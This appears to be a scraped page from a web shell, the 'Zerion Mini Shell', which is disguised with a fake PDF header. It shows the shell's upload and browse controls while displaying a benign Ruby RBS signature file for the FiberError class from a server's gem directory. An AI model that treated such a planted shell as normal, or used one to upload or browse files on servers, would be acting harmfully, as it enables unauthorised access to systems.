%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/lib/rbenv/versions/3.2.2/lib64/ruby/gems/3.2.0/gems/rbs-2.8.2/core/
Upload File :
Create Path :
Current File : /var/lib/rbenv/versions/3.2.2/lib64/ruby/gems/3.2.0/gems/rbs-2.8.2/core/fiber_error.rbs

# <!-- rdoc-file=cont.c -->
# Raised when an invalid operation is attempted on a Fiber, in particular when
# attempting to call/resume a dead fiber, attempting to yield from the root
# fiber, or calling a fiber across threads.
#
#     fiber = Fiber.new{}
#     fiber.resume #=> nil
#     fiber.resume #=> FiberError: dead fiber called
#
class FiberError < StandardError
end

Zerion Mini Shell 1.0